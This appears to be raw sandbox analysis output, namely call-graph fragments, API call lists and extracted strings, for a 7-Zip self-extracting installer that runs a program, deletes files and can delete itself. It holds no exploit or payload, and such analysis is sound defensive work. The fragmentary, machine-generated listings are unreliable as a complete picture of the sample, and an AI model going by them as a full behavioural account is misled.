20415->20417 20416->20417 20425 420efe GetStringTypeW 20416->20425 20417->20400 20420 41b184 20419->20420 20421 41b16f 20419->20421 20420->20401 20421->20420 20422 41d0a3 __strnicoll 20 API calls 20421->20422 20423 41b179 20422->20423 20424 41cfe6 __strnicoll 26 API calls 20423->20424 20424->20420 20425->20417 20427 4118b0 20426->20427 20427->20427 20428 4119a7 RaiseException 20427->20428 20429 4118bd 20428->20429 20429->18884 20431 409f1a 20430->20431 20437 409f78 20430->20437 20432 407d35 24 API calls 20431->20432 20433 409f29 IsWindow 20432->20433 20434 409f40 IsBadReadPtr 20433->20434 20435 409f52 20433->20435 20434->20435 20436 409d31 24 API calls 20435->20436 20436->20437 20437->18914 20446 41029b 20438->20446 20452 41041c 20441->20452 20444 410508 GetLastError 20445 41080c 20444->20445 20445->18957 20449 4102b4 20446->20449 20450 4101e4 2 API calls 20449->20450 20451 405f9e 20450->20451 20451->18947 20451->18965 20454 410434 20452->20454 20455 41045b 20454->20455 20456 410468 WriteFile 20454->20456 20455->20444 20456->20454 20625 41be50 20624->20625 20626 41be3e 20624->20626 20636 41bcfe 20625->20636 20652 41bed8 GetModuleHandleW 20626->20652 20637 41bd0a BuildCatchObjectHelperInternal 20636->20637 20662 41d8de EnterCriticalSection 20637->20662 20639 41bd14 20663 41bd41 20639->20663 20653 41be43 20652->20653 20653->20625 20654 41bf1c GetModuleHandleExW 20653->20654 20655 41bf46 GetProcAddress 20654->20655 20656 41bf69 20654->20656 20657 41bf5b 20655->20657 20658 41bf78 20656->20658 20659 41bf6f FreeLibrary 20656->20659 20657->20656 20660 41a247 _ValidateLocalCookies 5 API calls 20658->20660 20659->20658 20661 41be4f 20660->20661 20661->20625 20662->20639 20665 41bd4d BuildCatchObjectHelperInternal 20663->20665 20667 41bdba 20665->20667 20672 41bde8 20665->20672 20679 41c901 20665->20679 20668 41cb8a _CallSETranslator 5 API calls 20667->20668 20671 41bdd7 20667->20671 20668->20671 20669 41cb8a _CallSETranslator 5 API calls 20669->20672 20671->20669 20676 4249c9 20672->20676 20677 41a247 _ValidateLocalCookies 5 API calls 20676->20677 20678 4249d4 20677->20678 20678->20678 20682 41c5e4 20679->20682 20681 41c92c 20681->20667 20683 41c5f0 BuildCatchObjectHelperInternal 20682->20683 20690 41d8de EnterCriticalSection 20683->20690 20685 41c5fe 20691 41c7c7 20685->20691 20689 41c61c __onexit 20689->20681 20690->20685 20695 41c7e7 20691->20695 20696 41c7ef 20691->20696 20692 41a247 _ValidateLocalCookies 5 API calls 20693 41c60b 20692->20693 20697 41c629 20693->20697 20694 41d99a _free 20 API calls 20694->20695 20695->20692 20696->20694 20696->20695 20700 41d926 LeaveCriticalSection 20697->20700 20699 41c633 20699->20689 20700->20699 20712 41cacb 20711->20712 20713 41cadd 20711->20713 20714 41cad9 20712->20714 20718 4200f4 20712->20718 20721 41fe3b 20713->20721 20714->17614 20725 41ffa6 20718->20725 20722 41fe54 20721->20722 20723 41a247 _ValidateLocalCookies 5 API calls 20722->20723 20724 41caec 20723->20724 20724->17614 20728 41ff04 20725->20728 20727 41ffe5 20727->20714 20729 41ff10 BuildCatchObjectHelperInternal 20728->20729 20736 41d8de EnterCriticalSection 20729->20736 20731 41ff86 20745 41ff9a 20731->20745 20733 41ff92 __onexit 20733->20727 20735 41ff1a ___scrt_uninitialize_crt 20735->20731 20737 41fe83 20735->20737 20736->20735 20738 41fe8f BuildCatchObjectHelperInternal 20737->20738 20748 41e9ca EnterCriticalSection 20738->20748 20740 41fe99 ___scrt_uninitialize_crt 20743 41fed1 20740->20743 20749 4200ad 20740->20749 20759 41fef8 20743->20759 20744 41fef0 __onexit 20744->20735 20901 41d926 LeaveCriticalSection 20745->20901 20747 41ffa4 20747->20733 20748->20740 20750 4200c3 20749->20750 20751 4200ba 20749->20751 20762 42004a 20750->20762 20752 41ffa6 ___scrt_uninitialize_crt 59 API calls 20751->20752 20754 4200c0 20752->20754 20754->20743 20757 4200e3 20775 421be6 20757->20775 20900 41e9de LeaveCriticalSection 20759->20900 20761 41ff02 20761->20744 20763 420061 20762->20763 20767 420086 20762->20767 20764 41e890 ___scrt_uninitialize_crt 26 API calls 20763->20764 20763->20767 20765 42007f 20764->20765 20786 422206 20765->20786 20767->20754 20768 41e890 20767->20768 20769 41e8b1 20768->20769 20770 41e89c 20768->20770 20769->20757 20771 41d0a3 __strnicoll 20 API calls 20770->20771 20772 41e8a1 20771->20772 20773 41cfe6 __strnicoll 26 API calls 20772->20773 20774 41e8ac 20773->20774 20774->20757 20776 421bf7 20775->20776 20778 421c04 20775->20778 20777 41d0a3 __strnicoll 20 API calls 20776->20777 20785 421bfc 20777->20785 20779 421c4d 20778->20779 20782 421c2b 20778->20782 20780 41d0a3 __strnicoll 20 API calls 20779->20780 20781 421c52 20780->20781 20783 41cfe6 __strnicoll 26 API calls 20781->20783 20869 421b4e 20782->20869 20783->20785 20785->20754 20787 422212 BuildCatchObjectHelperInternal 20786->20787 20788 422232 20787->20788 20789 42221a 20787->20789 20791 4222cd 20788->20791 20795 422264 20788->20795 20811 41d090 20789->20811 20793 41d090 __dosmaperr 20 API calls 20791->20793 20796 4222d2 20793->20796 20794 41d0a3 __strnicoll 20 API calls 20804 422227 __onexit 20794->20804 20814 420240 EnterCriticalSection 20795->20814 20798 41d0a3 __strnicoll 20 API calls 20796->20798 20800 4222da 20798->20800 20799 42226a 20801 422286 20799->20801 20802 42229b 20799->20802 20803 41cfe6 __strnicoll 26 API calls 20800->20803 20806 41d0a3 __strnicoll 20 API calls 20801->20806 20815 4222ee 20802->20815 20803->20804 20804->20767 20808 42228b 20806->20808 20807 422296 20866 4222c5 20807->20866 20809 41d090 __dosmaperr 20 API calls 20808->20809 20809->20807 20812 41d681 __dosmaperr 20 API calls 20811->20812 20813 41d095 20812->20813 20813->20794 20814->20799 20816 42231b 20815->20816 20853 422314 20815->20853 20817 42233f 20816->20817 20818 42231f 20816->20818 20821 42238e 20817->20821 20822 422371 20817->20822 20820 41d090 __dosmaperr 20 API calls 20818->20820 20819 41a247 _ValidateLocalCookies 5 API calls 20823 4224fc 20819->20823 20824 422324 20820->20824 20829 4228eb ___scrt_uninitialize_crt 28 API calls 20821->20829 20833 4223a1 20821->20833 20825 41d090 __dosmaperr 20 API calls 20822->20825 20823->20807 20826 41d0a3 __strnicoll 20 API calls 20824->20826 20828 422376 20825->20828 20830 42232c 20826->20830 20827 421e96 ___scrt_uninitialize_crt 30 API calls 20831 4223b2 20827->20831 20832 41d0a3 __strnicoll 20 API calls 20828->20832 20829->20833 20834 41cfe6 __strnicoll 26 API calls 20830->20834 20835 4223f6 20831->20835 20836 4223b7 20831->20836 20837 42237e 20832->20837 20833->20827 20834->20853 20841 42240a 20835->20841 20842 42244f WriteFile 20835->20842 20838 4223e0 20836->20838 20839 4223bb 20836->20839 20840 41cfe6 __strnicoll 26 API calls 20837->20840 20843 421c65 ___scrt_uninitialize_crt 29 API calls 20838->20843 20847 421e29 ___scrt_uninitialize_crt 6 API calls 20839->20847 20849 4223d6 20839->20849 20840->20853 20845 422415 20841->20845 20846 42243f 20841->20846 20844 422473 GetLastError 20842->20844 20842->20849 20843->20849 20844->20849 20850 42241a 20845->20850 20851 42242f 20845->20851 20848 421f0c ___scrt_uninitialize_crt 7 API calls 20846->20848 20847->20849 20848->20849 20849->20853 20855 422499 20849->20855 20856 4224bd 20849->20856 20850->20849 20854 421feb ___scrt_uninitialize_crt 7 API calls 20850->20854 20852 4220d9 ___scrt_uninitialize_crt 8 API calls 20851->20852 20852->20849 20853->20819 20854->20849 20857 4224a0 20855->20857 20858 4224b4 20855->20858 20856->20853 20861 41d0a3 __strnicoll 20 API calls 20856->20861 20859 41d0a3 __strnicoll 20 API calls 20857->20859 20860 41d06d __dosmaperr 20 API calls 20858->20860 20862 4224a5 20859->20862 20860->20853 20863 4224d9 20861->20863 20864 41d090 __dosmaperr 20 API calls 20862->20864 20865 41d090 __dosmaperr 20 API calls 20863->20865 20864->20853 20865->20853 20867 420263 ___scrt_uninitialize_crt LeaveCriticalSection 20866->20867 20868 4222cb 20867->20868 20868->20804 20870 421b5a BuildCatchObjectHelperInternal 20869->20870 20883 420240 EnterCriticalSection 20870->20883 20872 421b69 20873 421bb0 20872->20873 20884 420317 20872->20884 20875 41d0a3 __strnicoll 20 API calls 20873->20875 20877 421bb5 20875->20877 20876 421b95 FlushFileBuffers 20876->20877 20878 421ba1 20876->20878 20897 421bda 20877->20897 20880 41d090 __dosmaperr 20 API calls 20878->20880 20882 421ba6 GetLastError 20880->20882 20881 421bcd __onexit 20881->20785 20882->20873 20883->20872 20885 420324 20884->20885 20887 420339 20884->20887 20886 41d090 __dosmaperr 20 API calls 20885->20886 20888 420329 20886->20888 20889 41d090 __dosmaperr 20 API calls 20887->20889 20891 42035e 20887->20891 20890 41d0a3 __strnicoll 20 API calls 20888->20890 20892 420369 20889->20892 20893 420331 20890->20893 20891->20876 20894 41d0a3 __strnicoll 20 API calls 20892->20894 20893->20876 20895 420371 20894->20895 20896 41cfe6 __strnicoll 26 API calls 20895->20896 20896->20893 20898 420263 ___scrt_uninitialize_crt LeaveCriticalSection 20897->20898 20899 421be4 20898->20899 20899->20881 20900->20761 20901->20747 23152 410a27 23155 410a38 23152->23155 23153 410b8f 23154 412547 2 API calls 23154->23155 23155->23153 23155->23154 23157 4125ba 23155->23157 23158 4125f6 23157->23158 23159 4125c7 23157->23159 23158->23155 23159->23158 23161 40b8c1 2 API calls 23159->23161 23162 40c140 23159->23162 23161->23159 23164 40c14f 23162->23164 23163 40c1f6 23163->23159 23164->23163 23165 40bfee 95 API calls 23164->23165 23166 40b8c1 2 API calls 23164->23166 23167 40c0dd 97 API calls 23164->23167 23168 4107d3 2 API calls 23164->23168 23165->23164 23166->23164 23167->23164 23168->23164 21488 4178d2 21489 41a247 _ValidateLocalCookies 5 API calls 21488->21489 21490 4178e4 21489->21490 21493 418887 21490->21493 21494 418895 ___except_validate_context_record 21493->21494 21502 418014 21494->21502 21497 4188da 21501 4178fd 21497->21501 21516 418c8d 21497->21516 21498 418900 21498->21501 21519 41835a 21498->21519 21563 418022 21502->21563 21504 418019 21505 418021 21504->21505 21577 41e207 21504->21577 21505->21497 21505->21498 21505->21501 21509 41bac0 IsProcessorFeaturePresent 21511 41bacc 21509->21511 21510 41badf 21512 41bfb3 _CallSETranslator 29 API calls 21510->21512 21514 41ce21 _CallSETranslator 8 API calls 21511->21514 21515 41bae9 21512->21515 21513 41bab6 21513->21509 21513->21510 21514->21510 21636 418ca5 21516->21636 21518 418ca0 21518->21501 21522 41837a FindHandler 21519->21522 21520 41baea BuildCatchObjectHelperInternal 23 API calls 21521 4186e7 21520->21521 21524 41849a 21522->21524 21527 418014 _CallSETranslator 48 API calls 21522->21527 21560 418495 21522->21560 21523 418650 21525 41864e 21523->21525 21523->21560 21674 4186e8 21523->21674 21524->21523 21528 4184e6 21524->21528 21526 418014 _CallSETranslator 48 API calls 21525->21526 21526->21560 21530 4183d8 21527->21530 21534 4185fb ___DestructExceptionObject 21528->21534 21659 417694 21528->21659 21531 41867e 21530->21531 21533 418014 _CallSETranslator 48 API calls 21530->21533 21531->21501 21535 4183e6 21533->21535 21534->21525 21538 418d8d IsInExceptionSpec 23 API calls 21534->21538 21534->21560 21536 418014 _CallSETranslator 48 API calls 21535->21536 21542 4183ee 21536->21542 21537 418500 ___TypeMatch 21537->21534 21664 4182da 21537->21664 21539 418648 21538->21539 21539->21525 21541 4186a3 21539->21541 21540 418014 _CallSETranslator 48 API calls 21543 418437 21540->21543 21544 418014 _CallSETranslator 48 API calls 21541->21544 21542->21540 21542->21560 21543->21524 21546 418014 _CallSETranslator 48 API calls 21543->21546 21545 4186a8 21544->21545 21547 418014 _CallSETranslator 48 API calls 21545->21547 21549 418441 21546->21549 21548 4186b0 21547->21548 21691 41787f RtlUnwind 21548->21691 21550 418014 _CallSETranslator 48 API calls 21549->21550 21553 41844c 21550->21553 21654 418d8d 21553->21654 21554 4186c7 21556 418c8d FindHandler 48 API calls 21554->21556 21558 4186d3 FindHandler 21556->21558 21557 418458 21557->21524 21561 41845e ___DestructExceptionObject FindHandler type_info::operator== 21557->21561 21692 418c09 21558->21692 21560->21520 21560->21531 21561->21560 21562 417a3f __CxxThrowException@8 RaiseException 21561->21562 21562->21541 21564 41802b 21563->21564 21565 41802e GetLastError 21563->21565 21564->21504 21607 4191b1 21565->21607 21568 4180a8 SetLastError 21568->21504 21569 4191ec ___vcrt_FlsSetValue 6 API calls 21570 41805c _CallSETranslator 21569->21570 21571 418084 21570->21571 21572 4191ec ___vcrt_FlsSetValue 6 API calls 21570->21572 21576 418062 21570->21576 21573 4191ec ___vcrt_FlsSetValue 6 API calls 21571->21573 21574 418098 21571->21574 21572->21571 21573->21574 21612 41b9dd 21574->21612 21576->21568 21615 41e143 21577->21615 21579 41baab 21579->21513 21580 41e257 21579->21580 21581 41e263 BuildCatchObjectHelperInternal 21580->21581 21582 41d681 __dosmaperr 20 API calls 21581->21582 21586 41e290 _CallSETranslator 21581->21586 21589 41e28a _CallSETranslator 21581->21589 21582->21589 21583 41e2d5 21584 41d0a3 __strnicoll 20 API calls 21583->21584 21585 41e2da 21584->21585 21587 41cfe6 __strnicoll 26 API calls 21585->21587 21593 41e301 21586->21593 21626 41d8de EnterCriticalSection 21586->21626 21590 41e2bf 21587->21590 21588 4249c9 _CallSETranslator 5 API calls 21592 41e44c 21588->21592 21589->21583 21589->21586 21589->21590 21590->21588 21592->21513 21598 41e35b 21593->21598 21599 41e353 21593->21599 21604 41e386 21593->21604 21627 41d926 LeaveCriticalSection 21593->21627 21596 41bfb3 _CallSETranslator 29 API calls 21596->21598 21598->21604 21628 41e24e 21598->21628 21599->21596 21601 41d533 pre_c_initialization 23 API calls 21605 41e3e9 21601->21605 21603 41e24e _CallSETranslator 23 API calls 21603->21604 21631 41e405 21604->21631 21605->21590 21606 41d533 pre_c_initialization 23 API calls 21605->21606 21606->21590 21608 4190cc try_get_function 5 API calls 21607->21608 21609 4191cb 21608->21609 21610 4191e3 TlsGetValue 21609->21610 21611 418043 21609->21611 21610->21611 21611->21568 21611->21569 21611->21576 21613 41d99a _free 20 API calls 21612->21613 21614 41b9f5 21613->21614 21614->21576 21616 41e14f BuildCatchObjectHelperInternal 21615->21616 21621 41d8de EnterCriticalSection 21616->21621 21618 41e15d 21622 41e191 21618->21622 21620 41e184 __onexit 21620->21579 21621->21618 21625 41d926 LeaveCriticalSection 21622->21625 21624 41e19b 21624->21620 21625->21624 21626->21593 21627->21599 21629 41d533 pre_c_initialization 23 API calls 21628->21629 21630 41e253 21629->21630 21630->21603 21632 41e3da 21631->21632 21633 41e40b 21631->21633 21632->21590 21632->21601 21632->21605 21635 41d926 LeaveCriticalSection 21633->21635 21635->21632 21637 418cb1 FindHandler BuildCatchObjectHelperInternal 21636->21637 21638 418014 _CallSETranslator 48 API calls 21637->21638 21644 418ccc __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 21638->21644 21640 418d4c 21643 418d51 __FrameHandler3::FrameUnwindToState 21640->21643 21650 41baea 21640->21650 21643->21518 21644->21640 21645 418d73 21644->21645 21646 418014 _CallSETranslator 48 API calls 21645->21646 21647 418d78 21646->21647 21648 418d83 21647->21648 21649 418014 _CallSETranslator 48 API calls 21647->21649 21648->21640 21649->21648 21651 41baf6 BuildCatchObjectHelperInternal 21650->21651 21652 41d533 pre_c_initialization 23 API calls 21651->21652 21653 41bafb 21652->21653 21655 418e21 21654->21655 21658 418da1 ___TypeMatch 21654->21658 21656 41baea BuildCatchObjectHelperInternal 23 API calls 21655->21656 21657 418e26 21656->21657 21658->21557 21660 4176b8 21659->21660 21661 4176fd 21660->21661 21662 41baea BuildCatchObjectHelperInternal 23 API calls 21660->21662 21661->21537 21663 417715 21662->21663 21665 4182f9 21664->21665 21666 4182ec 21664->21666 21708 41787f RtlUnwind 21665->21708 21704 418241 21666->21704 21669 41830e 21670 418ca5 __FrameHandler3::FrameUnwindToState 48 API calls 21669->21670 21671 41831f __FrameHandler3::FrameUnwindToState 21670->21671 21709 418a45 21671->21709 21673 418347 FindHandlerForForeignException 21673->21537 21675 4186fa 21674->21675 21676 41874c 21674->21676 21677 418014 _CallSETranslator 48 API calls 21675->21677 21676->21525 21678 418701 21677->21678 21679 418745 21678->21679 21680 41870a EncodePointer 21678->21680 21679->21676 21682 4187f3 21679->21682 21683 418764 21679->21683 21681 418014 _CallSETranslator 48 API calls 21680->21681 21687 418719 21681->21687 21684 41baea BuildCatchObjectHelperInternal 23 API calls 21682->21684 21685 417694 pair 23 API calls 21683->21685 21686 4187f8 21684->21686 21689 418777 21685->21689 21687->21679 21688 417774 _CallSETranslator 48 API calls 21687->21688 21688->21679 21689->21676 21690 4182da FindHandlerForForeignException 50 API calls 21689->21690 21690->21689 21691->21554 21693 418c15 __EH_prolog3_catch 21692->21693 21694 418014 _CallSETranslator 48 API calls 21693->21694 21695 418c1a 21694->21695 21696 418c3d 21695->21696 21768 4192cc 21695->21768 21698 41baea BuildCatchObjectHelperInternal 23 API calls 21696->21698 21700 418c42 21698->21700 21705 41824d BuildCatchObjectHelperInternal 21704->21705 21723 418102 21705->21723 21707 418275 ___AdjustPointer BuildCatchObjectHelperInternal 21707->21665 21708->21669 21710 418a51 BuildCatchObjectHelperInternal 21709->21710 21730 417903 21710->21730 21713 418014 _CallSETranslator 48 API calls 21714 418a7d 21713->21714 21715 418014 _CallSETranslator 48 API calls 21714->21715 21716 418a88 21715->21716 21717 418014 _CallSETranslator 48 API calls 21716->21717 21718 418a93 21717->21718 21719 418014 _CallSETranslator 48 API calls 21718->21719 21720 418a9b _CallCatchBlock2 21719->21720 21735 418b8d 21720->21735 21722 418b75 21722->21673 21725 41810e BuildCatchObjectHelperInternal 21723->21725 21724 418189 ___AdjustPointer BuildCatchObjectHelperInternal 21724->21707 21725->21724 21726 41baea BuildCatchObjectHelperInternal 23 API calls 21725->21726 21727 418240 BuildCatchObjectHelperInternal 21726->21727 21728 418102 BuildCatchObjectHelperInternal 23 API calls 21727->21728 21729 418275 ___AdjustPointer BuildCatchObjectHelperInternal 21728->21729 21729->21707 21731 418014 _CallSETranslator 48 API calls 21730->21731 21732 417914 21731->21732 21733 418014 _CallSETranslator 48 API calls 21732->21733 21734 41791f 21733->21734 21734->21713 21744 417927 21735->21744 21737 418b9e 21738 418014 _CallSETranslator 48 API calls 21737->21738 21739 418ba4 21738->21739 21740 418014 _CallSETranslator 48 API calls 21739->21740 21741 418baf 21740->21741 21743 418bf0 ___DestructExceptionObject 21741->21743 21760 4193c1 21741->21760 21743->21722 21745 418014 _CallSETranslator 48 API calls 21744->21745 21746 417930 21745->21746 21747 418014 _CallSETranslator 48 API calls 21746->21747 21748 417938 21747->21748 21749 41baea BuildCatchObjectHelperInternal 23 API calls 21748->21749 21750 417940 21748->21750 21751 41796b 21749->21751 21750->21737 21752 41a247 _ValidateLocalCookies 5 API calls 21751->21752 21753 417980 21752->21753 21754 41798b 21753->21754 21755 418887 __InternalCxxFrameHandler 51 API calls 21753->21755 21754->21737 21756 4179c3 21755->21756 21757 4179da 21756->21757 21763 41787f RtlUnwind 21756->21763 21764 417774 21757->21764 21761 418014 _CallSETranslator 48 API calls 21760->21761 21762 4193c9 21761->21762 21762->21743 21763->21757 21765 417784 21764->21765 21766 417796 21764->21766 21765->21754 21767 418014 _CallSETranslator 48 API calls 21766->21767 21767->21765 21769 418014 _CallSETranslator 48 API calls 21768->21769 21770 4192d2 21769->21770 21771 41baea BuildCatchObjectHelperInternal 23 API calls 21770->21771 21772 4192e8 21771->21772 23565 41d3f8 23566 41d403 23565->23566 23567 41d413 23565->23567 23571 41d419 23566->23571 23570 41d99a _free 20 API calls 23570->23567 23572 41d434 23571->23572 23573 41d42e 23571->23573 23574 41d99a _free 20 API calls 23572->23574 23575 41d99a _free 20 API calls 23573->23575 23576 41d440 23574->23576 23575->23572 23577 41d99a _free 20 API calls 23576->23577 23578 41d44b 23577->23578 23579 41d99a _free 20 API calls 23578->23579 23580 41d456 23579->23580 23581 41d99a _free 20 API calls 23580->23581 23582 41d461 23581->23582 23583 41d99a _free 20 API calls 23582->23583 23584 41d46c 23583->23584 23585 41d99a _free 20 API calls 23584->23585 23586 41d477 23585->23586 23587 41d99a _free 20 API calls 23586->23587 23588 41d482 23587->23588 23589 41d99a _free 20 API calls 23588->23589 23590 41d48d 23589->23590 23591 41d99a _free 20 API calls 23590->23591 23592 41d49b 23591->23592 23597 41d261 23592->23597 23594 41d4c1 23605 41d2c2 23594->23605 23596 41d40b 23596->23570 23598 41d26d BuildCatchObjectHelperInternal 23597->23598 23613 41d8de EnterCriticalSection 23598->23613 23601 41d277 23603 41d99a _free 20 API calls 23601->23603 23604 41d2a1 23601->23604 23602 41d2ae __onexit 23602->23594 23603->23604 23614 41d2b6 23604->23614 23606 41d2ce BuildCatchObjectHelperInternal 23605->23606 23618 41d8de EnterCriticalSection 23606->23618 23608 41d2d8 23609 41d4e8 pre_c_initialization 20 API calls 23608->23609 23610 41d2eb 23609->23610 23619 41d301 23610->23619 23612 41d2f9 __onexit 23612->23596 23613->23601 23617 41d926 LeaveCriticalSection 23614->23617 23616 41d2c0 23616->23602 23617->23616 23618->23608 23622 41d926 LeaveCriticalSection 23619->23622 23621 41d30b 23621->23612 23622->23621 21920 41ccfc 21923 41cc8d 21920->21923 21922 41cd21 21924 41cc99 BuildCatchObjectHelperInternal 21923->21924 21931 41d8de EnterCriticalSection 21924->21931 21926 41ccd1 21932 41cce5 21926->21932 21928 41cca3 21928->21926 21930 420a69 __fassign 20 API calls 21928->21930 21929 41ccdd __onexit 21929->21922 21930->21928 21931->21928 21935 41d926 LeaveCriticalSection 21932->21935 21934 41ccef 21934->21929 21935->21934 22800 41fdaf 22801 41fdd5 22800->22801 22804 41fdd1 22800->22804 22801->22804 22805 41eaaa 2 API calls 22801->22805 22806 41eb5e 31 API calls 22801->22806 22802 41a247 _ValidateLocalCookies 5 API calls 22803 41fe37 22802->22803 22804->22802 22805->22801 22806->22801
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406802
                                                                                                                                                                      • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040771B
                                                                                                                                                                        • Part of subcall function 00406390: LoadLibraryA.KERNEL32(kernel32), ref: 004063A1
                                                                                                                                                                        • Part of subcall function 00406390: #17.COMCTL32 ref: 004063AC
                                                                                                                                                                        • Part of subcall function 00406390: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0040642D
                                                                                                                                                                        • Part of subcall function 00406390: wsprintfW.USER32 ref: 00406441
                                                                                                                                                                      • GetCommandLineW.KERNEL32(?), ref: 00406862
                                                                                                                                                                      • GetCommandLineW.KERNEL32(00000001,?,?,?,?,00000000), ref: 004068AC
                                                                                                                                                                      • wsprintfW.USER32 ref: 004068D6
                                                                                                                                                                        • Part of subcall function 00405C24: lstrlenW.KERNEL32(?), ref: 00405C6E
                                                                                                                                                                        • Part of subcall function 00405C24: lstrlenW.KERNEL32(?), ref: 00405C79
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208), ref: 004069B2
                                                                                                                                                                      • wsprintfW.USER32 ref: 00406D9B
                                                                                                                                                                      • GetCommandLineW.KERNEL32(?), ref: 00406E5D
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000020), ref: 00406F21
                                                                                                                                                                      • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 00406F28
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040706C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommandLinewsprintf$Processlstrlen$CurrentFileFolderInitializeLibraryLoadMessageModuleNamePathSizeSpecialVersionWorking
                                                                                                                                                                      • String ID: " -$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$InstallPath$PreExtract$RunProgram$SelfDelete$SetEnvironment$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$h1^$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$x86$x}B
                                                                                                                                                                      • API String ID: 1696040357-2609009280
                                                                                                                                                                      • Opcode ID: 2f79422dc320cf5d518135fd2e0f946dea209421ac33f12a81fd630665ccb93c
                                                                                                                                                                      • Instruction ID: 1d6cb3108b6439bf9ee8cb1a272d1cd87d89d23fe3df34ccd02e4b6f4d93d42f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f79422dc320cf5d518135fd2e0f946dea209421ac33f12a81fd630665ccb93c
                                                                                                                                                                      • Instruction Fuzzy Hash: C4820771E04215AADB24BBA5EC52BAE3768AF04318F10453FF502B62E2DB7D5D80CB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00426BB8,00403E01,?,00000001), ref: 00403CBC
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,00426BC0,?,00403E01), ref: 00403D08
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,00426BC4), ref: 00403D1E
                                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,?,00403E01), ref: 00403D37
                                                                                                                                                                      • DeleteFileW.KERNELBASE(?), ref: 00403D44
                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00403D56
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00403D65
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00403D71
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00403E01,00000000), ref: 00403D7B
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(00403E01), ref: 00403D88
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Find$AttributesDirectorylstrcmp$CloseCurrentDeleteFirstNextRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3205300333-0
                                                                                                                                                                      • Opcode ID: 6355085a4aa394518ea26f01bc4742eebc40cec18b36215e5ed97df422a240df
                                                                                                                                                                      • Instruction ID: a906d678dd43812030e965f764584ed42eb8dc6fdf672ca0bd142a2143b6f6fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 6355085a4aa394518ea26f01bc4742eebc40cec18b36215e5ed97df422a240df
                                                                                                                                                                      • Instruction Fuzzy Hash: D7313031A00218ABDB21AFA1EC48EDE7F7DAF00746F54417AF516F10A0EB389B45DA5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 765 4025a9-4025f4 call 41158b * 2 call 416a40 772 402601-402616 765->772 773 4025f6-4025fe 765->773 774 402621-402655 ShowWindow BringWindowToTop call 404cf6 call 4116bd 772->774 775 402618-40261e 772->775 773->772 780 402657-40266f ShellExecuteExW 774->780 781 402689-40268b 774->781 775->774 782 40268c-4026a3 call 419a19 * 2 780->782 783 402671-402673 780->783 781->782 785 402680-402683 CloseHandle 783->785 786 402675-40267a WaitForSingleObject 783->786 785->781 786->785
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(00040300,00000005,?,?,00000001), ref: 0040262C
                                                                                                                                                                      • BringWindowToTop.USER32(?), ref: 00402635
                                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00402667
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000001), ref: 0040267A
